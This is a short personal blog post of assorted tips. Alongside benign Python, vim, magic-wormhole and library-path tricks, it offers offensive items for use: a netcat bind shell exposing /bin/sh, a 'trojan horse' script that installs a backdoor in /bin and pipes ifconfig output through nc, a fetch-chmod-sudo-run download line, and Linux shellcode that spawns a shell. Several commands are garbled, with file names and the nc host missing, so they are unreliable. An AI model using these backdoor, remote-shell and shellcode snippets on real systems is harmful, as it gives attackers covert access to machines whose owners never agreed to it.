Some little tricks

发布于 2019-10-14  150 次阅读

Simple remote shell using netcat

% nc -l -p 23333 -e /bin/sh & # running /bin/sh on local port 23333

Little&stupid trojan horse script

chmod +x backdoor
apt install netcat
mv backdoor /bin/
ifconfig | nc 23333
backdoor &

And it's usage

% wget http://izayoi/iza_file/ && chmod +x && sudo ./ && rm

A little progressbar achieve by python

Do it by handmaking

from time import *
for i in range(100):
    print("\r", "Progress: [%d/100]"%i, end="", flush=True)

Use library tqdm

pip's choice!

from tqdm import *
from time import *
for i in tqdm(range(100)):

wormhole : transmit file with python between any OS

shell 1
% sudo pip install magic-wormhole
% wormhole send [filename]
shell 2
% wormhole receive [wormhole-code]

Use vim:

  • Replace old_text with new_text in the full text at one time
    • :%s/old_text/new_text
  • Translate current file from text format into binary format & reverse
    • :%!xxd
    • :%!xxd -r

Binary conversion with python

Bin-bin(int(x, 8))bin(int(x, 10))bin(int(x, 16))
Octoct(int(x, 2))-oct(int(x, 10))oct(int(x, 16))
Decint(x, 2)int(x, 8)-int(x, 16)
Hexhex(int(x, 2))hex(int(x, 8))hex(int(x, 10))-

Shellcode marked

  • Linux i386 shell
    • \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
  • Linux amd64 shell
    • \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
    • \xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05
  • sys_open()
    • xor ecx,ecx;mov eax,0x5; push ecx;push 0x2f77726f(path_to_file); mov ebx,esp;xor edx,edx;int 0x80;
  • sys_read()
    • mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov dl,0x30;int 0x80;
  • sys_write()
    • mov eax,0x4;mov bl,0x1;int 0x80;

Add the dynamic link library search path temporarily

export  LD_LIBRARY_PATH=`pwd`
LD_PRELOAD=./ ./test